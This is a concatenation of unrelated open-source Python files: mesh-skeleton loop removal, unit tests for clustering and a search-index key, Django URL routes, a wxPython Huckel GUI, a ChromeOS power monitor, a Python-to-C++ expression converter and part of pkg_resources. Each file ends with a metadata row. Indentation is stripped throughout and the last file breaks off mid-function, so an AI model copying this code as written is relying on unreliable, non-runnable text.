if child != parent:
stack.append(child)
parents.append(node)
dist_stack.append(
dist + np.linalg.norm(vertices[node,:] - vertices[child,:])
)
root_stack.append(root)
return distgraph
def remove_loops(skeleton):
if skeleton.empty():
return skeleton
skels = []
for component in skeleton.components():
skels.append(_remove_loops(component))
return Skeleton.simple_merge(skels).consolidate(remove_disconnected_vertices=False)
def _remove_loops(skeleton):
nodes = skeleton.vertices
edges = np.copy(skeleton.edges).astype(np.int32)
while True: # Loop until all cycles are removed
edges = edges.astype(np.int32)
cycle_path = kimimaro.skeletontricks.find_cycle(edges)
# cycle_path = kimimaro.skeletontricks.find_cycle_cython(edges)
if len(cycle_path) == 0:
break
edges_cycle = path2edge(cycle_path)
edges_cycle = np.array(edges_cycle, dtype=np.uint32)
edges_cycle = np.sort(edges_cycle, axis=1)
nodes_cycle = np.unique(edges_cycle)
nodes_cycle = nodes_cycle.astype(np.int32)
unique_nodes, unique_counts = np.unique(edges, return_counts=True)
branch_nodes = unique_nodes[ unique_counts >= 3 ]
# branch cycles are cycle nodes that coincide with a branch point
branch_cycle = nodes_cycle[np.isin(nodes_cycle,branch_nodes)]
branch_cycle = branch_cycle.astype(np.int32)
# Summary:
# 0 external branches: isolated loop, just remove it
# 1 external branch : remove the loop but draw a line
# from the branch point to the farthest node in the loop.
# 2 external branches: remove the shortest path between
# the two entry/exit points.
# 3+ external branches: collapse the cycle into its centroid
# if the radius of the centroid is less than the EDT radius
# of the pixel located at the centroid. Otherwise, arbitrarily
# cut an edge from the cycle to break it. This radius rule prevents
# issues where we collapse to a point outside of the neurite.
# Loop with a tail
if branch_cycle.shape[0] == 1:
branch_cycle_point = nodes[branch_cycle, :]
cycle_points = nodes[nodes_cycle, :]
dist = np.sum((cycle_points - branch_cycle_point) ** 2, 1)
end_node = nodes_cycle[np.argmax(dist)]
edges = remove_row(edges, edges_cycle)
new_edge = np.array([[branch_cycle[0], end_node]], dtype=np.int32)
edges = np.concatenate((edges, new_edge), 0)
# Loop with an entrance and an exit
elif branch_cycle.shape[0] == 2:
# compute the shortest path between the two branch points
path = np.array(cycle_path[1:])
pos = np.where(np.isin(path, branch_cycle))[0]
if (pos[1] - pos[0]) < len(path) / 2:
path = path[pos[0]:pos[1]+1]
else:
path = np.concatenate((path[pos[1]:], path[:pos[0]+1]), 0)
edge_path = path2edge(path)
edge_path = np.sort(edge_path, axis=1)
row_valid = np.ones(edges_cycle.shape[0])
for i in range(edge_path.shape[0]):
row_valid -= (edges_cycle[:,0] == edge_path[i,0]) * (edges_cycle[:,1] == edge_path[i,1])
row_valid = row_valid.astype(bool)
edge_path = edges_cycle[row_valid,:]
edges = remove_row(edges, edge_path)
# Totally isolated loop
elif branch_cycle.shape[0] == 0:
edges = remove_row(edges, edges_cycle)
# Loops with many ways in and out
# looks like here we unify them into their
# centroid. This doesn't work well if the loop
# is large.
else:
branch_cycle_points = nodes[branch_cycle,:]
centroid = np.mean(branch_cycle_points, axis=0)
dist = np.sum((nodes - centroid) ** 2, 1)
intersect_node = np.argmin(dist)
intersect_point = nodes[intersect_node,:]
dist = np.sum((branch_cycle_points - intersect_point) ** 2, 1)
dist = np.sqrt(np.max(dist))
# Fix the "stargate" issue where a large loop
# can join lots of things to the near center
# by just making a tiny snip if the distance
# is greater than the radius of the connected node.
if dist > skeleton.radii[ intersect_node ]:
edges = remove_row(edges, edges_cycle[:1,:])
continue
edges = remove_row(edges, edges_cycle)
new_edges = np.zeros((branch_cycle.shape[0], 2))
new_edges[:,0] = branch_cycle
new_edges[:,1] = intersect_node
if np.isin(intersect_node, branch_cycle):
idx = np.where(branch_cycle == intersect_node)
new_edges = np.delete(new_edges, idx, 0)
edges = np.concatenate((edges,new_edges), 0)
skeleton.vertices = nodes
skeleton.edges = edges.astype(np.uint32)
return skeleton
def path2edge(path):
"""
path: sequence of nodes
Returns: sequence separated into edges
"""
edges = np.zeros([len(path) - 1, 2], dtype=np.uint32)
edges[:,0] = path[0:-1]
edges[:,1] = path[1:]
return edges
def remove_row(array, rows2remove):
array = np.sort(array, axis=1)
rows2remove = np.sort(rows2remove, axis=1)
for i in range(rows2remove.shape[0]):
idx = find_row(array,rows2remove[i,:])
if np.sum(idx == -1) == 0:
array = np.delete(array, idx, axis=0)
return array.astype(np.int32)
def find_row(array, row):
"""
array: array to search for
row: row to find
Returns: row indices
"""
row = np.array(row)
if array.shape[1] != row.size:
raise ValueError("Dimensions do not match!")
NDIM = array.shape[1]
valid = np.zeros(array.shape, dtype=bool)
for i in range(NDIM):
valid[:,i] = array[:,i] == row[i]
row_loc = np.zeros([ array.shape[0], 1 ])
if NDIM == 2:
row_loc = valid[:,0] * valid[:,1]
elif NDIM == 3:
row_loc = valid[:,0] * valid[:,1] * valid[:,2]
idx = np.where(row_loc==1)[0]
if len(idx) == 0:
idx = -1
return idx
| gpl-3.0 | 9,190,897,515,746,704,000 | 30.634551 | 119 | 0.67197 | false |
marionleborgne/nupic.research | tests/nlp/unit/hierarchical_clustering_test.py | 8 | 4036 | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have purchased from
# Numenta, Inc. a separate commercial license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import numpy
import os
import scipy.sparse
import unittest
from mock import patch
from htmresearch.algorithms.hierarchical_clustering import HierarchicalClustering
from nupic.algorithms.KNNClassifier import KNNClassifier
class TestHierarchicalClustering(unittest.TestCase):
def testComputeOverlapsWithoutDiagonal(self):
data = scipy.sparse.csr_matrix([
[1, 1, 0, 1],
[0, 1, 1, 0],
[1, 1, 1, 1]
])
dists = HierarchicalClustering._computeOverlaps(data, selfOverlaps=False)
self.assertEqual(dists.shape, (3,))
self.assertEqual(dists.tolist(), [1, 3, 2])
def testComputeOverlapsWithDiagonal(self):
data = scipy.sparse.csr_matrix([
[1, 1, 0, 1],
[0, 1, 1, 0],
[1, 1, 1, 1]
])
dists = HierarchicalClustering._computeOverlaps(data, selfOverlaps=True)
self.assertEqual(dists.shape, (6,))
self.assertEqual(dists.tolist(), [3, 1, 3, 2, 2, 4])
def testExtractVectorsFromKNN(self):
vectors = numpy.random.rand(10, 25) < 0.1
# Populate KNN
knn = KNNClassifier()
for i in xrange(vectors.shape[0]):
knn.learn(vectors[i], 0)
# Extract vectors from KNN
sparseDataMatrix = HierarchicalClustering._extractVectorsFromKNN(knn)
self.assertEqual(
sorted(sparseDataMatrix.todense().tolist()),
sorted(vectors.tolist())
)
def testCondensedIndex(self):
flat = range(6)
# first try only indexing upper triangular region
indicesA = [0, 0, 0, 1, 1, 2]
indicesB = [1, 2, 3, 2, 3, 3]
res = HierarchicalClustering._condensedIndex(indicesA, indicesB, 4)
self.assertEqual(res.tolist(), flat)
# ensure we get same result by transposing some indices for the lower
# triangular region
indicesA = [0, 2, 3, 1, 3, 2]
indicesB = [1, 0, 0, 2, 1, 3]
res = HierarchicalClustering._condensedIndex(indicesA, indicesB, 4)
self.assertEqual(res.tolist(), flat)
# finally check that we get an assertion error if we try accessing
# an element from the diagonal
with self.assertRaises(AssertionError):
indicesA = [0, 2, 0, 1, 3, 2]
indicesB = [1, 2, 3, 2, 1, 3]
_ = HierarchicalClustering._condensedIndex(indicesA, indicesB, 4)
def testGetPrototypes(self):
data = scipy.sparse.csr_matrix([
[1, 1, 0, 1],
[1, 0, 1, 1],
[0, 1, 1, 0],
[1, 1, 1, 1]
])
overlaps = HierarchicalClustering._computeOverlaps(data)
prototypes = HierarchicalClustering._getPrototypes([0, 1, 2, 3], overlaps)
self.assertEqual(set(prototypes.tolist()), set([3]))
prototypes = HierarchicalClustering._getPrototypes([1, 2, 3], overlaps, 2)
self.assertEqual(set(prototypes.tolist()), set([3, 1]))
prototypes = HierarchicalClustering._getPrototypes([0, 2, 3], overlaps, 2)
self.assertEqual(set(prototypes.tolist()), set([3, 0]))
prototypes = HierarchicalClustering._getPrototypes([0, 1, 2], overlaps, 2)
self.assertEqual(set(prototypes.tolist()), set([0, 1]))
if __name__ == "__main__":
unittest.main()
| agpl-3.0 | -6,371,929,708,740,457,000 | 31.031746 | 81 | 0.657334 | false |
tylertian/Openstack | openstack F/horizon/horizon/dashboards/nova/overview/urls.py | 3 | 1098 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf.urls.defaults import url, patterns
from .views import ProjectOverview, WarningView
urlpatterns = patterns('horizon.dashboards.nova.overview.views',
url(r'^$', ProjectOverview.as_view(), name='index'),
url(r'^warning$', WarningView.as_view(), name='warning'),
)
| apache-2.0 | -4,844,407,295,060,887,000 | 36.862069 | 78 | 0.738616 | false |
phazel/pixelated-user-agent | service/test/unit/adapter/search/test_index_storage_key.py | 9 | 2159 | #
# Copyright (c) 2015 ThoughtWorks, Inc.
#
# Pixelated is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pixelated is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Pixelated. If not, see <http://www.gnu.org/licenses/>.
from leap.soledad.common.document import SoledadDocument
from mockito import mock, when, unstub, verify
from twisted.internet import defer
from twisted.trial import unittest
from pixelated.adapter.search.index_storage_key import SearchIndexStorageKey
import os
class TestSearchIndexStorageKey(unittest.TestCase):
def tearDown(self):
unstub()
@defer.inlineCallbacks
def test_get_or_create_key_returns_key(self):
soledad = mock()
when(soledad).get_from_index('by-type', 'index_key').thenReturn([SoledadDocument(json='{"value": "somekey"}')])
key = yield SearchIndexStorageKey(soledad).get_or_create_key()
self.assertEqual('somekey', key)
@defer.inlineCallbacks
def test_get_or_create_creates_key_if_not_exists(self):
expected_key = '\x8brN\xa3\xe5-\x828 \x95\x8d\n\xc6\x0c\x82\n\xd7!\xa9\xb0.\xcc\\h\xa9\x98\xe9V\xc1*<\xfe\xbb\x8f\xcd\x7f\x8c#\xff\xf9\x840\xdf{}\x97\xebS-*\xe2f\xf9B\xa9\xb1\x0c\x1d-C)\xc5\xa0B'
base64_encoded_key = 'i3JOo+UtgjgglY0KxgyCCtchqbAuzFxoqZjpVsEqPP67j81/jCP/+YQw33t9l+tTLSriZvlCqbEM\nHS1DKcWgQg==\n'
soledad = mock()
when(soledad).get_from_index('by-type', 'index_key').thenReturn([])
when(os).urandom(64).thenReturn(expected_key)
key = yield SearchIndexStorageKey(soledad).get_or_create_key()
self.assertEqual(expected_key, key)
verify(soledad).create_doc(dict(type='index_key', value=base64_encoded_key))
| agpl-3.0 | -5,284,624,681,563,570,000 | 40.519231 | 203 | 0.724873 | false |
randlet/Orbis | orbis/orbis.py | 1 | 2525 | import gui
import gui.grid_utils
import numpy
import settings
import shmo
import sys
import os
os.chdir(os.path.dirname(__file__))
import wx
#====================================================================================
class MainFrame(gui.VOrbisFrame):
"""The main Orbis application frame"""
#----------------------------------------------------------------------
def __init__(self,parent,*args, **kwargs):
"""do any initial setup required for Orbis"""
super(MainFrame,self).__init__(parent,*args,**kwargs)
self.SetTitle(settings.TITLE)
self.Layout()
self.Fit()
self.Maximize()
self.solver = shmo.HuckelSolver()
#---------------------------------------------------------------------------
def on_huckel_change(self,event):
"""some parameter of molecule has been changed, update solver"""
num_electrons = self.num_electrons.GetValue()
data = self.get_huckel_data()
self.solver.set_data(data,num_electrons=num_electrons)
#---------------------------------------------------------------------------
def get_huckel_data(self):
"""return current atom/bond matrix for solver"""
shape = gui.grid_utils.get_shape(self.huckel_grid)
data = numpy.zeros(shape)
for row in range(shape[0]):
for col in range(shape[1]):
try:
data[row, col] = float(self.huckel_grid.GetCellValue(row,col).strip())
except (TypeError,ValueError):
data[row, col] = 0.
return numpy.matrix(data)
#---------------------------------------------------------------------------
def set_huckel_data(self,data):
"""set huckel matrix to input data"""
self.set_matrix_shape(data.shape)
rows,cols = data.shape
for row in range(rows):
for col in range(cols):
self.huckel_grid.SetCellValue(row,col,"{0}".format(data[row,col]))
#---------------------------------------------------------------------------
def set_matrix_shape(self,shape):
"""set the huckel matrix shape"""
gui.grid_utils.set_shape(self.huckel_grid,shape)
#----------------------------------------------------------------------
def main():
"""Launch the main program"""
app = wx.App(useBestVisual=True)
frame = MainFrame(None)
frame.Show()
app.MainLoop()
if __name__ == "__main__":
main() | bsd-3-clause | -4,218,916,548,015,141,000 | 36.701493 | 90 | 0.457426 | false |
hefen1/chromium | tools/telemetry/telemetry/core/platform/power_monitor/cros_power_monitor.py | 2 | 5726 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import re
from telemetry import decorators
from telemetry.core.platform.power_monitor import sysfs_power_monitor
class CrosPowerMonitor(sysfs_power_monitor.SysfsPowerMonitor):
"""PowerMonitor that relies on 'dump_power_status' to monitor power
consumption of a single ChromeOS application.
"""
def __init__(self, platform_backend):
"""Constructor.
Args:
platform_backend: A LinuxBasedPlatformBackend object.
Attributes:
_initial_power: The result of 'dump_power_status' before the test.
_start_time: The epoch time at which the test starts executing.
"""
super(CrosPowerMonitor, self).__init__(platform_backend)
self._initial_power = None
self._start_time = None
@decorators.Cache
def CanMonitorPower(self):
return super(CrosPowerMonitor, self).CanMonitorPower()
def StartMonitoringPower(self, browser):
super(CrosPowerMonitor, self).StartMonitoringPower(browser)
if self._IsOnBatteryPower():
sample = self._platform.RunCommand(['dump_power_status;', 'date', '+%s'])
self._initial_power, self._start_time = CrosPowerMonitor.SplitSample(
sample)
def StopMonitoringPower(self):
cpu_stats = super(CrosPowerMonitor, self).StopMonitoringPower()
power_stats = {}
if self._IsOnBatteryPower():
sample = self._platform.RunCommand(['dump_power_status;', 'date', '+%s'])
final_power, end_time = CrosPowerMonitor.SplitSample(sample)
# The length of the test is used to measure energy consumption.
length_h = (end_time - self._start_time) / 3600.0
power_stats = CrosPowerMonitor.ParsePower(self._initial_power,
final_power, length_h)
return CrosPowerMonitor.CombineResults(cpu_stats, power_stats)
@staticmethod
def SplitSample(sample):
"""Splits a power and time sample into the two separate values.
Args:
sample: The result of calling 'dump_power_status; date +%s' on the
device.
Returns:
A tuple of power sample and epoch time of the sample.
"""
sample = sample.strip()
index = sample.rfind('\n')
power = sample[:index]
time = sample[index + 1:]
return power, int(time)
@staticmethod
def IsOnBatteryPower(status, board):
"""Determines if the devices is being charged.
Args:
status: The parsed result of 'dump_power_status'
board: The name of the board running the test.
Returns:
True if the device is on battery power; False otherwise.
"""
on_battery = status['line_power_connected'] == '0'
# Butterfly can incorrectly report AC online for some time after unplug.
# Check battery discharge state to confirm.
if board == 'butterfly':
on_battery |= status['battery_discharging'] == '1'
return on_battery
def _IsOnBatteryPower(self):
"""Determines if the device is being charged.
Returns:
True if the device is on battery power; False otherwise.
"""
status = CrosPowerMonitor.ParsePowerStatus(
self._platform.RunCommand(['dump_power_status']))
board_data = self._platform.RunCommand(['cat', '/etc/lsb-release'])
board = re.search('BOARD=(.*)', board_data).group(1)
return CrosPowerMonitor.IsOnBatteryPower(status, board)
@staticmethod
def ParsePowerStatus(sample):
"""Parses 'dump_power_status' command output.
Args:
sample: The output of 'dump_power_status'
Returns:
Dictionary containing all fields from 'dump_power_status'
"""
rv = collections.defaultdict(dict)
for ln in sample.splitlines():
words = ln.split()
assert len(words) == 2
rv[words[0]] = words[1]
return dict(rv)
@staticmethod
def ParsePower(initial_stats, final_stats, length_h):
"""Parse output of 'dump_power_status'
Args:
initial_stats: The output of 'dump_power_status' before the test.
final_stats: The output of 'dump_power_status' after the test.
length_h: The length of the test in hours.
Returns:
Dictionary in the format returned by StopMonitoringPower().
"""
out_dict = {'identifier': 'dump_power_status'}
component_utilization = {}
initial = CrosPowerMonitor.ParsePowerStatus(initial_stats)
final = CrosPowerMonitor.ParsePowerStatus(final_stats)
# The charge value reported by 'dump_power_status' is not precise enough to
# give meaningful results across shorter tests, so average energy rate and
# the length of the test are used.
initial_power_mw = float(initial['battery_energy_rate']) * 10 ** 3
final_power_mw = float(final['battery_energy_rate']) * 10 ** 3
average_power_mw = (initial_power_mw + final_power_mw) / 2.0
out_dict['power_samples_mw'] = [initial_power_mw, final_power_mw]
out_dict['energy_consumption_mwh'] = average_power_mw * length_h
# Duplicating CrOS battery fields where applicable.
battery = {}
battery['charge_full'] = float(final['battery_charge_full'])
battery['charge_full_design'] = (
float(final['battery_charge_full_design']))
battery['charge_now'] = float(final['battery_charge'])
battery['current_now'] = float(final['battery_current'])
battery['energy'] = float(final['battery_energy'])
battery['energy_rate'] = float(final['battery_energy_rate'])
battery['voltage_now'] = float(final['battery_voltage'])
component_utilization['battery'] = battery
out_dict['component_utilization'] = component_utilization
return out_dict
| bsd-3-clause | -7,981,824,072,240,068,000 | 36.424837 | 79 | 0.676388 | false |
cms-externals/sherpa | MODEL/UFO/py_to_cpp.py | 1 | 3556 | """
Conversion of python expressions to C++ compatible strings.
This code is based on 'converter.py', part of the HERWIG++ UFO interface.
Many thanks to David Grellscheid for the permission to use this code.
Does not support custom functions other than the ones in the cmath_dictionary defined below.
Does not support complex atan function (C++11 feature)
"""
import ast
from ufo_exception import ufo_exception
# how to translate cmath python names
# into names appropriate for C++
cmath_dictionary = {
"cos": "cos",
"sin": "sin",
"tan": "tan",
"acos": "acos",
"asin": "asin",
"atan": "atan",
"sqrt": "sqrt",
"pi": "M_PI",
"log":"log"
}
def py_to_cpp(expr):
return cpp_visitor().cpp_string(expr)
def c_string_from_num(num):
# where this is used, we have 'complex' typedef'd
if isinstance(num, complex):
if num == 0:
return "(0.0)"
return "(complex({0},{1}))".format(num.real,num.imag)
# do not want integers floating around in generated c code
if isinstance(num, int):
return "({0})".format(float(num))
if isinstance(num, float):
return "({0})".format(num)
raise ufo_exception("Can't convert {0}".format(num))
class cpp_visitor(ast.NodeVisitor):
def __init__(self):
pass
def cpp_string(self, expr):
self.string = ""
self.vars = set()
self.visit(ast.parse(expr))
return self.string
def generic_visit(self, node):
raise NotImplementedError("Node of type \"{0}\" is not implemented".format(type(node).__name__))
def pass_super(self,node):
super(type(self),self).generic_visit(node)
def visit_Module(self, node):
self.pass_super(node)
def visit_Expr(self, node):
self.pass_super(node)
def visit_Attribute(self,node):
if node.value.id != "cmath":
raise NotImplementedError("Attribute \"{0}\" is not implemented".format(node.value.id))
self.string += cmath_dictionary[node.attr]
def visit_UnaryOp(self,node):
self.string += "("
self.visit(node.op)
self.visit(node.operand)
self.string += ")"
def visit_BinOp(self, node):
if type(node.op) == type(ast.Pow()):
self.handle_power(node)
else:
self.string += "("
self.visit(node.left)
self.visit(node.op)
self.visit(node.right)
self.string += ")"
def handle_power(self, node):
self.string += "pow("
self.visit(node.left)
self.string += ","
self.visit(node.right)
self.string += ")"
def visit_Call(self,node):
self.visit(node.func)
self.string += "("
if len(node.args) > 0:
self.visit(node.args[0])
for a in node.args[1:]:
self.string += ","
self.visit(a)
self.string += ")"
def visit_Name(self,node):
text = str(node.id)
self.vars.add(text)
self.string += text
def visit_Num(self, node):
# some zeros are encoded as 0j
self.string += "0.0" if node.n == 0 else str(float(node.n))
def visit_Mult(self, node):
self.string += "*"
def visit_Add(self, node):
self.string += "+"
def visit_Sub(self, node):
self.string += "-"
def visit_USub(self, node):
self.string += "-"
def visit_UAdd(self, node):
self.string += "+"
def visit_Div(self, node):
self.string += "/"
| gpl-3.0 | -9,153,510,512,711,954,000 | 26.353846 | 104 | 0.566929 | false |
RubenSchmidt/giscademy | layers/models.py | 1 | 1095 | from django.contrib.gis.db.models import MultiPolygonField, PointField, LineStringField
from django.contrib.postgres.fields import JSONField
from django.db import models
from giscademy.utils.model_utils import Timestampable
class Layer(Timestampable):
name = models.CharField(max_length=255)
exercise = models.ForeignKey('courses.Exercise', blank=True, null=True, on_delete=models.SET_NULL)
user = models.ForeignKey('auth.User', blank=True, null=True)
def __str__(self):
return self.name
@property
def points(self):
return self.point_set.all()
@property
def linestrings(self):
return self.linestring_set.all()
@property
def polygons(self):
return self.polygon_set.all()
class Feature(Timestampable):
layer = models.ForeignKey(
'layers.Layer'
)
properties = JSONField(null=True, blank=True)
class Meta:
abstract = True
class Point(Feature):
geom = PointField()
class LineString(Feature):
geom = LineStringField()
class Polygon(Feature):
geom = MultiPolygonField()
| mit | 9,149,400,294,067,611,000 | 21.8125 | 102 | 0.693151 | false |
cntnboys/cmput410-project | venv/lib/python2.7/site-packages/pkg_resources/__init__.py | 16 | 103944 | """
Package resource API
--------------------
A resource is a logical file contained within a package, or a logical
subdirectory thereof. The package resource API expects resource names
to have their path parts separated with ``/``, *not* whatever the local
path separator is. Do not use os.path operations to manipulate resource
names being passed into the API.
The package resource API is designed to work with normal filesystem packages,
.egg files, and unpacked .egg files. It can also work in a limited way with
.zip files and with custom PEP 302 loaders that support the ``get_data()``
method.
"""
from __future__ import absolute_import
import sys
import os
import io
import time
import re
import imp
import zipfile
import zipimport
import warnings
import stat
import functools
import pkgutil
import token
import symbol
import operator
import platform
import collections
import plistlib
import email.parser
import tempfile
from pkgutil import get_importer
PY3 = sys.version_info > (3,)
PY2 = not PY3
if PY3:
from urllib.parse import urlparse, urlunparse
if PY2:
from urlparse import urlparse, urlunparse
if PY3:
string_types = str,
else:
string_types = str, eval('unicode')
# capture these to bypass sandboxing
from os import utime
try:
from os import mkdir, rename, unlink
WRITE_SUPPORT = True
except ImportError:
# no write support, probably under GAE
WRITE_SUPPORT = False
from os import open as os_open
from os.path import isdir, split
# Avoid try/except due to potential problems with delayed import mechanisms.
if sys.version_info >= (3, 3) and sys.implementation.name == "cpython":
import importlib._bootstrap as importlib_bootstrap
else:
importlib_bootstrap = None
try:
import parser
except ImportError:
pass
try:
import pkg_resources._vendor.packaging.version
import pkg_resources._vendor.packaging.specifiers
packaging = pkg_resources._vendor.packaging
except ImportError:
# fallback to naturally-installed version; allows system packagers to
# omit vendored packages.
import packaging.version
import packaging.specifiers
class PEP440Warning(RuntimeWarning):
"""
Used when there is an issue with a version or specifier not complying with
PEP 440.
"""
class _SetuptoolsVersionMixin(object):
def __hash__(self):
return super(_SetuptoolsVersionMixin, self).__hash__()
def __lt__(self, other):
if isinstance(other, tuple):
return tuple(self) < other
else:
return super(_SetuptoolsVersionMixin, self).__lt__(other)
def __le__(self, other):
if isinstance(other, tuple):
return tuple(self) <= other
else:
return super(_SetuptoolsVersionMixin, self).__le__(other)
def __eq__(self, other):
if isinstance(other, tuple):
return tuple(self) == other
else:
return super(_SetuptoolsVersionMixin, self).__eq__(other)
def __ge__(self, other):
if isinstance(other, tuple):
return tuple(self) >= other
else:
return super(_SetuptoolsVersionMixin, self).__ge__(other)
def __gt__(self, other):
if isinstance(other, tuple):
return tuple(self) > other
else:
return super(_SetuptoolsVersionMixin, self).__gt__(other)
def __ne__(self, other):
if isinstance(other, tuple):
return tuple(self) != other
else:
return super(_SetuptoolsVersionMixin, self).__ne__(other)
def __getitem__(self, key):
return tuple(self)[key]
def __iter__(self):
component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
replace = {
'pre': 'c',
'preview': 'c',
'-': 'final-',
'rc': 'c',
'dev': '@',
}.get
def _parse_version_parts(s):
for part in component_re.split(s):
part = replace(part, part)
if not part or part == '.':
continue
if part[:1] in '0123456789':
# pad for numeric comparison
yield part.zfill(8)
else:
yield '*'+part
# ensure that alpha/beta/candidate are before final
yield '*final'
def old_parse_version(s):
parts = []
for part in _parse_version_parts(s.lower()):
if part.startswith('*'):
# remove '-' before a prerelease tag
if part < '*final':
while parts and parts[-1] == '*final-':
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == '00000000':
parts.pop()
parts.append(part)
return tuple(parts)
# Warn for use of this function
warnings.warn(
"You have iterated over the result of "
"pkg_resources.parse_version. This is a legacy behavior which is "
"inconsistent with the new version class introduced in setuptools "
"8.0. That class should be used directly instead of attempting to "
"iterate over the result.",
RuntimeWarning,
stacklevel=1,
)
for part in old_parse_version(str(self)):
yield part
class SetuptoolsVersion(_SetuptoolsVersionMixin, packaging.version.Version):
pass
class SetuptoolsLegacyVersion(_SetuptoolsVersionMixin,
packaging.version.LegacyVersion):
pass
def parse_version(v):
try:
return SetuptoolsVersion(v)
except packaging.version.InvalidVersion:
return SetuptoolsLegacyVersion(v)
_state_vars = {}
def _declare_state(vartype, **kw):
globals().update(kw)
_state_vars.update(dict.fromkeys(kw, vartype))
def __getstate__():
state = {}
g = globals()
for k, v in _state_vars.items():
state[k] = g['_sget_'+v](g[k])
return state
def __setstate__(state):
g = globals()
for k, v in state.items():
g['_sset_'+_state_vars[k]](k, g[k], v)
return state
def _sget_dict(val):
return val.copy()
def _sset_dict(key, ob, state):
ob.clear()
ob.update(state)
def _sget_object(val):
return val.__getstate__()
def _sset_object(key, ob, state):
ob.__setstate__(state)
_sget_none = _sset_none = lambda *args: None
def get_supported_platform():
"""Return this platform's maximum compatible version.
distutils.util.get_platform() normally reports the minimum version
of Mac OS X that would be required to *use* extensions produced by
distutils. But what we want when checking compatibility is to know the
version of Mac OS X that we are *running*. To allow usage of packages that
explicitly require a newer version of Mac OS X, we must also know the
current version of the OS.
If this condition occurs for any other platform with a version in its
platform strings, this function should be extended accordingly.
"""
plat = get_build_platform()
m = macosVersionString.match(plat)
if m is not None and sys.platform == "darwin":
try:
plat = 'macosx-%s-%s' % ('.'.join(_macosx_vers()[:2]), m.group(3))
except ValueError:
# not Mac OS X
pass
return plat
__all__ = [
# Basic resource access and distribution/entry point discovery
'require', 'run_script', 'get_provider', 'get_distribution',
'load_entry_point', 'get_entry_map', 'get_entry_info',
'iter_entry_points',
'resource_string', 'resource_stream', 'resource_filename',
'resource_listdir', 'resource_exists', 'resource_isdir',
# Environmental control
'declare_namespace', 'working_set', 'add_activation_listener',
'find_distributions', 'set_extraction_path', 'cleanup_resources',
'get_default_cache',
# Primary implementation classes
'Environment', 'WorkingSet', 'ResourceManager',
'Distribution', 'Requirement', 'EntryPoint',
# Exceptions
'ResolutionError', 'VersionConflict', 'DistributionNotFound',
'UnknownExtra', 'ExtractionError',
# Warnings
'PEP440Warning',
# Parsing functions and string utilities
'parse_requirements', 'parse_version', 'safe_name', 'safe_version',
'get_platform', 'compatible_platforms', 'yield_lines', 'split_sections',
'safe_extra', 'to_filename', 'invalid_marker', 'evaluate_marker',
# filesystem utilities
'ensure_directory', 'normalize_path',
# Distribution "precedence" constants
'EGG_DIST', 'BINARY_DIST', 'SOURCE_DIST', 'CHECKOUT_DIST', 'DEVELOP_DIST',
# "Provider" interfaces, implementations, and registration/lookup APIs
'IMetadataProvider', 'IResourceProvider', 'FileMetadata',
'PathMetadata', 'EggMetadata', 'EmptyProvider', 'empty_provider',
'NullProvider', 'EggProvider', 'DefaultProvider', 'ZipProvider',
'register_finder', 'register_namespace_handler', 'register_loader_type',
'fixup_namespace_packages', 'get_importer',
# Deprecated/backward compatibility only
'run_main', 'AvailableDistributions',
]
class ResolutionError(Exception):
"""Abstract base for dependency resolution errors"""
def __repr__(self):
return self.__class__.__name__+repr(self.args)
class VersionConflict(ResolutionError):
"""An already-installed version conflicts with the requested version"""
class DistributionNotFound(ResolutionError):
"""A requested distribution was not found"""
class UnknownExtra(ResolutionError):
"""Distribution doesn't have an "extra feature" of the given name"""
_provider_factories = {}
PY_MAJOR = sys.version[:3]
EGG_DIST = 3
BINARY_DIST = 2
SOURCE_DIST = 1
CHECKOUT_DIST = 0
DEVELOP_DIST = -1
def register_loader_type(loader_type, provider_factory):
"""Register `provider_factory` to make providers for `loader_type`
`loader_type` is the type or class of a PEP 302 ``module.__loader__``,
and `provider_factory` is a function that, passed a *module* object,
returns an ``IResourceProvider`` for that module.
"""
_provider_factories[loader_type] = provider_factory
def get_provider(moduleOrReq):
"""Return an IResourceProvider for the named module or requirement"""
if isinstance(moduleOrReq, Requirement):
return working_set.find(moduleOrReq) or require(str(moduleOrReq))[0]
try:
module = sys.modules[moduleOrReq]
except KeyError:
__import__(moduleOrReq)
module = sys.modules[moduleOrReq]
loader = getattr(module, '__loader__', None)
return _find_adapter(_provider_factories, loader)(module)
def _macosx_vers(_cache=[]):
if not _cache:
version = platform.mac_ver()[0]
# fallback for MacPorts
if version == '':
plist = '/System/Library/CoreServices/SystemVersion.plist'
if os.path.exists(plist):
if hasattr(plistlib, 'readPlist'):
plist_content = plistlib.readPlist(plist)
if 'ProductVersion' in plist_content:
version = plist_content['ProductVersion']
_cache.append(version.split('.'))
return _cache[0]
def _macosx_arch(machine):
return {'PowerPC': 'ppc', 'Power_Macintosh': 'ppc'}.get(machine, machine)
def get_build_platform():
"""Return this platform's string for platform-specific distributions
